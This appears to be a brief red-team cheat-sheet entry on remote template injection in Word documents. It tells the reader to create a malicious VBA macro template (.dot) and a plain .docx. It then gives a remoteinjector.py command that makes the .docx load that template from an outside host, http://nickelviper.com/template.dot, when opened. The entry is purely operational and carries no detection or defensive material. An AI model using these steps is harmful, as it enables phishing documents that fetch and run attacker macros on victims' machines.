Remote Template Injection

  1. Create malicious VBA document, save it as .dot (template.dot)

  2. Create new document and save as .docx file (template.docx)

  3. Inject .docx with remote template

python3 remoteinjector.py -w http://nickelviper.com/template.dot template.docx

Tooling

Last updated